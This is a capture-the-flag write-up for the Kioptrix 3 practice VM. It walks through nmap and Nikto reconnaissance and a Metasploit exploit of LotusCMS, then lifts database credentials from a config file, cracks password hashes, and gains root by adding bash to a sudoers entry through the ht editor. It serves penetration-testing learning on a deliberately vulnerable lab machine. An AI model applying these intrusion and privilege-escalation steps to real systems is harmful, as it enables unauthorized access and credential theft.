This has been some long time I haven’t written another write-up. This one’s for Kioptrix 3 that you can find here.
Host Discovery
$ nmap -sP 192.168.56.1/24
and we got the IP address : 192.168.56.101
.
As it was explained, you need to add 192.168.56.101 kioptrix3.com
in your /etc/hosts.
Fingerprinting
Then, let’s find what kind of services are running on the host machine.
$ nmap 192.168.56.101 -sV -A
Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-12 20:15 CEST
Nmap scan report for malicious (192.168.56.101)
Host is up (0.00034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
title = "kioptrix 3 write up"
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.59 seconds
Quite obvious, let’s check this Web server !
Reconnaissance
Thanks to Nikto, we managed to find useful informations:
(...)
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
(...)
And with DirBuster:
(...)
Dir found: /gallery/ - 500
File found: /gallery/index.php - 500
File found: /gallery/recent.php - 500
Dir found: /gallery/p.php/ - 500
Dir found: /gallery/g.php/ - 500
Dir found: /gallery/themes/ - 200
(...)
Moreover, by navigating on the website, I managed to get the CMS behind:
<meta name="keywords" content="LotusCMS" />
Exploitation
Thanks to this information, I looked on Exploit-db for some known vulnerabilities.
Bingo, there was. :-)
I ran metasploit and exploited this eval() Remote Command Execution.
I managed to get a (limited) meterpreter session on the machine, and retrieved different files on the filesystem such as configuration file gconfig.php
:
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/
// Installer Details -----------------------------------------------
// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
// Setting Details -------------------------------------------------
if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
echo("A connection to the database couldn't be established: " . mysql_error());
die();
}else {
if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
echo("The Gallarific database couldn't be opened: " . mysql_error());
die();
}else {
$settings=mysql_query("select * from gallarific_settings");
if(mysql_num_rows($settings)!=0){
while($data=mysql_fetch_array($settings)){
$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
}
}
}
}
?>
Thanks to those credentials, I managed to access the phpMyAdmin and dumped all databases.
I got different hashes:
dreg:0d3eccfb887aabd50f243b3f155c0f85 => Mast3r
loneferret:5badcaf789d3d1d09794d8f021f40f0e => starwars
Moreover, I had the admin’s password: n0t7t1k4.
I managed to log in with loneferret’s credentials on the SSH service.
I checked the files which were in the home folder and I found CompanyPolicy.README
:
$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
And then:
$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
Thanks to this, I only had to edit the /etc/sudoers
file and update the entry:
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht, /bin/bash
Back to the terminal:
loneferret@Kioptrix3:~$ sudo bash
root@Kioptrix3:~#
and Voilà, I was able to access the file /root/Congrats.txt
.
Nice VM it was a fun trick with ht
command.